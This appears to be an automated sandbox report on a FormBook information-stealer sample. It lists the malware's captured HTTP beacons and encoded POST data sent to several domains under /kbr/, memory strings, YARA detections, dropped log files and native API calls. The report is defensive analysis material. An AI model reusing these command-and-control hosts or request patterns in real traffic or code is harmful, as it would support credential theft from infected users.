48 66 48 78 42 53 79 4e 63 71 34 7a 36 34 6a 59 59 62 52 57 6b 73 4e 63 39 4e 72 54 45 75 65 78 73 38 69 32 5a 51 65 74 6e 30 2d 76 48 6e 70 33 37 78 32 61 6b 31 66 78 4f 44 70 31 36 28 30 62 6c 6e 4d 30 54 42 43 4c 38 32 56 4d 64 43 30 6a 7a 4f 36 76 37 31 56 53 77 67 7a 7a 78 4d 67 5a 72 79 47 66 71 79 6d 39 65 6d 48 35 35 68 65 45 6f 45 71 56 6b 68 63 53 32 6d 36 35 34 43 5a 41 38 70 52 43 58 57 64 56 5f 30 54 4e 48 30 79 6e 64 77 47 47 71 76 78 6b 52 4a 71 4e 6b 6e 66 71 68 55 54 65 68 71 51 45 67 4b 67 59 68 7e 74 59 53 62 6a 74 49 54 69 41 54 7a 4b 32 33 66 63 54 34 6b 44 32 30 49 67 7e 47 73 4d 4b 37 67 74 63 79 6a 34 6e 32 6a 73 6b 52 30 64 4a 78 6a 41 34 75 70 30 6d 52 54 37 32 61 6f 74 41 76 73 2d 4a 76 4b 74 68 79 57 6a 61 42 41 62 58 4e 4d 69 5a 59 63 46 65 44 4b 6a 30 4d 47 70 4d 58 62 6b 72 4a 50 43 47 39 6f 42 54 57 67 5f 50 63 42 42 55 6a 61 31 6b 5f 74 56 78 70 74 6c 6a 58 61 2d 52 6e 62 2d 41 45 38 46 76 44 48 6c 6f 49 35 6a 66 7a 5a 6a 68 72 6a 41 71 2d 4d 6a 7e 4f 44 76 75 30 6b 46 51 48 4c 49 6d 39 7
          Source: global trafficHTTP traffic detected: GET /kbr/?IDKDM4yx=sxsN1nJkucau2pxuJEzF+Ou0Y2fZMywFtQwHpaGWE6wL4+YSQccjq2y4HrbzwsseprRV&CXO03=fTjPtjUxadQPaH HTTP/1.1Host: www.broadcastsfromthebrainradio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /kbr/?IDKDM4yx=sxsN1nJkucau2pxuJEzF+Ou0Y2fZMywFtQwHpaGWE6wL4+YSQccjq2y4HrbzwsseprRV&CXO03=fTjPtjUxadQPaH HTTP/1.1Host: www.broadcastsfromthebrainradio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /kbr/?IDKDM4yx=sxsN1nJkucau2pxuJEzF+Ou0Y2fZMywFtQwHpaGWE6wL4+YSQccjq2y4HrbzwsseprRV&CXO03=fTjPtjUxadQPaH HTTP/1.1Host: www.broadcastsfromthebrainradio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /kbr/?IDKDM4yx=gJ1Bg3cRUnF3Tz72382304/qkwZXcYyoTiB0AKQqMrhmjr9Py6IZndCYQUtN235WiBmz&CXO03=fTjPtjUxadQPaH HTTP/1.1Host: www.theplayhousecafe.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /kbr/?IDKDM4yx=YUpLZ7qRZuPzGYNdcL/xU2BlEd7IXc2AXan4cBVO0XX3iA8cEVVOkbsZmghrOj5uDZzx&CXO03=fTjPtjUxadQPaH HTTP/1.1Host: www.cape-winelands.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.broadcastsfromthebrainradio.com
          Source: unknownHTTP traffic detected: POST /kbr/ HTTP/1.1Host: www.theplayhousecafe.comConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.theplayhousecafe.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.theplayhousecafe.com/kbr/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 49 44 4b 44 4d 34 79 78 3d 6f 72 35 37 7e 54 52 72 4b 58 56 4a 50 44 47 63 75 35 50 58 6a 4e 50 56 69 44 68 65 61 4a 58 71 57 6d 49 44 47 64 4d 70 4c 72 56 63 6a 76 70 45 28 4a 56 38 6c 36 28 6d 48 32 39 44 70 44 5a 68 36 41 54 66 78 4b 4c 45 43 66 6b 43 41 43 30 5f 46 34 66 42 75 4b 46 30 41 59 46 62 50 73 7e 74 64 6c 28 6c 6b 4e 36 77 6b 46 35 51 73 7a 4c 2d 68 31 35 50 6c 79 39 30 4b 4f 55 65 35 6a 28 63 65 4b 75 39 36 74 35 4b 39 7a 33 73 71 62 43 32 48 56 69 6b 62 50 50 32 54 79 52 55 41 76 6e 4b 36 54 32 74 6d 59 68 69 61 42 30 30 50 59 56 39 5a 58 31 4e 6b 56 74 43 42 72 4d 2d 34 31 74 5a 31 31 44 58 50 64 7e 57 58 5f 45 36 62 42 52 59 76 39 34 55 52 55 30 75 50 76 66 4d 50 4d 45 48 59 45 72 49 39 34 66 6b 31 67 30 57 59 41 58 37 46 31 51 55 4b 30 44 62 39 6f 31 49 75 62 66 63 44 76 74 58 36 57 53 48 79 66 4c 44 28 34 37 7a 70 52 6a 30 46 49 71 5a 4e 30 28 72 36 69 74 7a 61 46 4c 41 51 72 64 32 37 58 44 43 74 53 46 77 4f 4c 49 76 53 74 47 35 4d 36 4a 37 55 6b 47 6e 73 6d 64 59 6f 47 64 33 78 73 67 6a 5a 48 75 63 61 54 4a 52 36 4d 62 42 75 76 65 6a 4a 35 64 72 45 6f 70 32 65 39 4d 53 75 52 61 78 70 6d 69 7a 56 30 6f 75 67 4a 28 41 57 63 76 56 44 52 38 58 64 4e 7a 75 70 4d 33 38 7e 65 41 70 6c 4c 39 48 59 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: IDKDM4yx=or57~TRrKXVJPDGcu5PXjNPViDheaJXqWmIDGdMpLrVcjvpE(JV8l6(mH29DpDZh6ATfxKLECfkCAC0_F4fBuKF0AYFbPs~tdl(lkN6wkF5QszL-h15Ply90KOUe5j(ceKu96t5K9z3sqbC2HVikbPP2TyRUAvnK6T2tmYhiaB00PYV9ZX1NkVtCBrM-41tZ11DXPd~WX_E6bBRYv94URU0uPvfMPMEHYErI94fk1g0WYAX7F1QUK0Db9o1IubfcDvtX6WSHyfLD(47zpRj0FIqZN0(r6itzaFLAQrd27XDCtSFwOLIvStG5M6J7UkGnsmdYoGd3xsgjZHucaTJR6MbBuvejJ5drEop2e9MSuRaxpmizV0ougJ(AWcvVDR8XdNzupM38~eAplL9HYw).
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Mon, 14 Sep 2020 19:10:28 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f
          Source: explorer.exe, 00000002.00000000.376832424.0000000007C3C000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: sample.exe, 00000000.00000002.362051090.0000000002AD1000.00000004.00000001.sdmp, user8pl8ft.exe, 00000019.00000002.548157674.0000000003271000.00000004.00000001.sdmp, user8pl8ft.exe, 0000001A.00000002.562366464.0000000002A01000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000002.00000002.624955816.0000000002280000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.376917288.0000000007CC8000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: wlanext.exe, 00000003.00000002.628152195.0000000003C69000.00000004.00000001.sdmpString found in binary or memory: http://www.willowbeemasks.com
          Source: wlanext.exe, 00000003.00000002.628152195.0000000003C69000.00000004.00000001.sdmpString found in binary or memory: http://www.willowbeemasks.com/kbr/
          Source: explorer.exe, 00000002.00000000.377815932.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: wlanext.exe, 00000003.00000003.497390078.0000000000CDD000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
          Source: wlanext.exe, 00000003.00000003.497390078.0000000000CDD000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
          Source: wlanext.exe, 00000003.00000003.497390078.0000000000CDD000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
          Source: wlanext.exe, 00000003.00000003.497390078.0000000000CDD000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
          Source: wlanext.exe, 00000003.00000002.625486113.0000000002F98000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfken&display=windesktop&theme=win7&lc=1033&redirect_uri=htt
          Source: wlanext.exe, 00000003.00000003.497390078.0000000000CDD000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033W
          Source: wlanext.exe, 00000003.00000003.497390078.0000000000CDD000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
          Source: wlanext.exe, 00000003.00000003.497390078.0000000000CDD000.00000004.00000001.sdmp, wlanext.exe, 00000003.00000002.624269201.0000000000CDF000.00000004.00000020.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
          Source: sample.exe, 00000000.00000002.361713634.0000000000EAA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000001C.00000002.563585600.0000000001CE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000002.565851444.0000000003B8A000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.625534463.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001F.00000002.571218555.0000000001970000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000002.564732241.0000000003A85000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.392011804.00000000012E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.391924583.00000000012B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000002.561282015.0000000001970000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000002.558411329.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.550726466.00000000042F5000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.560919847.0000000000A30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001F.00000002.568017241.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000002.570354092.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001F.00000002.571182015.0000000001940000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.362545520.0000000003C5A000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.624361067.0000000000D40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.362367375.0000000003AD9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.551244965.00000000043FA000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.391628167.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.sample.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.2.user8pl8ft.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.2.user8pl8ft.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 31.2.user8pl8ft.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 31.2.user8pl8ft.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.sample.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Detected FormBook malwareShow sources
          Source: C:\Windows\SysWOW64\wlanext.exeDropped file: C:\Users\user\AppData\Roaming\J4833--2\J48logri.iniJump to dropped file
          Source: C:\Windows\SysWOW64\wlanext.exeDropped file: C:\Users\user\AppData\Roaming\J4833--2\J48logrv.iniJump to dropped file
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000001C.00000002.563585600.0000000001CE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001C.00000002.563585600.0000000001CE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001A.00000002.565851444.0000000003B8A000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001A.00000002.565851444.0000000003B8A000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.625534463.0000000002FD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.625534463.0000000002FD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001F.00000002.571218555.0000000001970000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001F.00000002.571218555.0000000001970000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001A.00000002.564732241.0000000003A85000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001A.00000002.564732241.0000000003A85000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.392011804.00000000012E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.392011804.00000000012E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.391924583.00000000012B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.391924583.00000000012B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001C.00000002.561282015.0000000001970000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001C.00000002.561282015.0000000001970000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001C.00000002.558411329.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001C.00000002.558411329.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000019.00000002.550726466.00000000042F5000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000019.00000002.550726466.00000000042F5000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001D.00000002.560919847.0000000000A30000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001D.00000002.560919847.0000000000A30000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001F.00000002.568017241.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001F.00000002.568017241.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000021.00000002.570354092.0000000000E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000021.00000002.570354092.0000000000E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001F.00000002.571182015.0000000001940000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001F.00000002.571182015.0000000001940000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.362545520.0000000003C5A000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.362545520.0000000003C5A000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.624361067.0000000000D40000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.624361067.0000000000D40000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.362367375.0000000003AD9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.362367375.0000000003AD9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000019.00000002.551244965.00000000043FA000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000019.00000002.551244965.00000000043FA000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.391628167.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.391628167.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.sample.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.sample.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 28.2.user8pl8ft.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 28.2.user8pl8ft.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 28.2.user8pl8ft.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 28.2.user8pl8ft.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 31.2.user8pl8ft.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 31.2.user8pl8ft.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 31.2.user8pl8ft.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 31.2.user8pl8ft.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.sample.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.sample.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_00419CA0 NtCreateFile,1_2_00419CA0
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_00419D50 NtReadFile,1_2_00419D50
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_00419DD0 NtClose,1_2_00419DD0
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_00419E80 NtAllocateVirtualMemory,1_2_00419E80
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_00419C9C NtCreateFile,1_2_00419C9C
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_00419D4A NtReadFile,1_2_00419D4A
